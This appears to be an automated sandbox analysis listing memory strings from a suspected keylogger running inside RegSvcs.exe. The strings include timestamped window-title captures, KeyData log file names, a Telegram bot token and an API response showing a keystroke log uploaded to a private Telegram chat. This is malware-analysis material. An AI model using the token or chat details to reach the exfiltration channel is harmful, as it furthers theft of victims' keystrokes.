Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:06<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, KeyDataffeKRuYR.txt.12.dr | Binary or memory string: [17:13:27]<<Program Manager>>
Source: KeyDataWNjCpCvy.txt.12.dr | Binary or memory string: [17:14:36]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:20]<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:53]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerC\dRegProv
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:13:52]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:58]<<Program Manager
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:26]<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:08]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :14:39]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:13:37]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:13:59]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:51]<<Program Manager>>O
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2562039910.0000000003E60000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: ]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:13:36]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:13:58]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 3Program Manager>>
Source: KeyDataWNjCpCvy.txt.12.dr | Binary or memory string: [17:14:35]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--4f5-b1ed-4060-99b9-fca7ff59c113--05]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:56Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:47]<<Program Manager>
Source: KeyDataqQPWdZsp.txt.12.dr | Binary or memory string: [17:14:13]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 59c113--f5-b1ed-4060-99b9-fca7ff59c113--f5-b1ed-4060-99b9-fca7ff59c113--:06]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:46]<<Program Manager>>
Source: KeyDataWNjCpCvy.txt.12.dr | Binary or memory string: [17:14:34]<<Program Manager>>
Source: KeyDataqQPWdZsp.txt.12.dr | Binary or memory string: [17:14:12]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:57]<<Program Manager>
Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--00]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A08000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:48]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:53]<<Program Manager>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:13:38]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 17:13:52]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:47]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E6E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:10]<<Program Manager>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:11]<<Program Manager>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerC\lfons\ocument
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \7879240328:AAHB7NT6yIB_0bX4QrhFBZNxniA38BjuGawProgram Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.dr | Binary or memory string: [17:13:24]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 8]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--52]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:15]<<Program Manager
Source: KeyDatahOJefols.txt.12.dr | Binary or memory string: [17:14:49]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--4]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.dr | Binary or memory string: [17:13:23]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: {"ok":true,"result":{"message_id":219,"from":{"id":7879240328,"is_bot":true,"first_name":"ugobest147","username":"ugobest147bot"},"chat":{"id":2001212894,"first_name":"Joe","last_name":"Joe","type":"private"},"date":1741385696,"document":{"file_name":"KeyDatabcwuTujf.txt","mime_type":"text/plain","file_id":"BQACAgQAAxkDAAPbZ8tv4JV1vzE0d3xr9EjmceS6UpgAAoIdAAKHvmBSrSlKCy7JjL02BA","file_unique_id":"AgADgh0AAoe-YFI","file_size":396},"caption":"DC-KeyDatabcwuTujf.txt:::user-PC\\user\\"}}7:13:37]<<Program Manager>>
Source: KeyDatagbqSMHst.txt.12.dr | Binary or memory string: [17:14:33]<<Program Manager>>
Source: KeyDataUxuffJyW.txt.12.dr | Binary or memory string: [17:14:16]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, KeyDatagbqSMHst.txt.12.dr | Binary or memory string: [17:14:32]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:23]<<Program Manager>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:57]<<Program Manager>>lfons\,
Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:50]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, KeyDataUxuffJyW.txt.12.dr | Binary or memory string: [17:14:15]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:13:39]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:13:56]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:13:40]<<Program Manager>>
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:02]<<Program Manager>>5
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: :13:42]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: 24]<<Program Managernagp
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.dr | Binary or memory string: [17:13:22]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--5]<<Program Manager>>
Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: [17:14:28]<<Program ManagerE
Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerC\donsdDocumentSU
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:21]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:02]<<Program Manager
                    Source: KeyDataJJZysHpj.txt.12.drBinary or memory string: [17:14:31]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:57]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, KeyDataUxuffJyW.txt.12.drBinary or memory string: [17:14:14]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:33]<<Program Manager>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:39]<<Program Manager9
                    Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E6E000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmp, KeyDataJJZysHpj.txt.12.drBinary or memory string: [17:14:30]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC\lfons\te
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:52]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:14:00]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--37]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:32]..Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:20]<<Program Manager
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:36]<<Program Manager>>F
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:43]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2562039910.0000000003E6E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:29]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:07]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ]<<Program Manager>>l: no-cache
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:53]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, KeyDataffeKRuYR.txt.12.drBinary or memory string: [17:13:31]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:20<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:58]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--8]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:09]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2562039910.0000000003E40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managertxtfons\7<
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:55]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:55]<<Program Manager>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :13:36]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:39]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A6D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:33]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp, KeyDatawKBOyTqv.txt.12.drBinary or memory string: [17:14:17]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:29]<<Program Manager>I
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSAFD RfComm [Bluetooth]13:32]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, KeyDataRbTCErLX.txt.12.drBinary or memory string: [17:14:42]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmp, KeyDataSSnjLnso.txt.12.drBinary or memory string: [17:14:20]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:26]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A6D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:41]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000BA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:57]<<Program Manager>>KeyD
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:55]<<Program Manager>>[
                    Source: RegSvcs.exe, 00000011.00000002.2561816569.00000000035A3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--57]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 17:14:55]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B0C000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, KeyDataffeKRuYR.txt.12.drBinary or memory string: [17:13:28]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113--:06]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2562039910.0000000003E6E000.00000004.00000020.00020000.00000000.sdmp, KeyDataRbTCErLX.txt.12.drBinary or memory string: [17:14:44]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:00]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:40]<<Program Manager>>,
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, KeyDataFCXylbPs.txt.12.drBinary or memory string: [17:14:27]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A1C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: MSAFD Tcpip [UDP/IP]13:34]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:52]<<Program Managerb
                    Source: RegSvcs.exe, 0000000C.00000002.2562493218.0000000004133000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000011.00000002.2560060278.0000000000A64000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:10]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:58Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B2D000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561120329.0000000000BDF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:51]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000A7B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:14:11<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2562264339.00000000040F8000.00000004.00000020.00020000.00000000.sdmp, KeyDataWrlJLqwI.txt.12.drBinary or memory string: [17:14:37]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2561943396.0000000003603000.00000004.00000020.00020000.00000000.sdmp, KeyDatajPmvaPVG.txt.12.drBinary or memory string: [17:14:54]<<Program Manager>>
                    Source: RegSvcs.exe, 00000011.00000002.2560060278.0000000000AB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: :13:56]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B75000.00000004.00000020.00020000.00000000.sdmp, KeyDataanrcUwNr.txt.12.drBinary or memory string: [17:13:18]<<Program Manager>>
                    Source: RegSvcs.exe, 0000000C.00000002.2560113520.0000000000B3A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: [17:13:38Program Manager>>
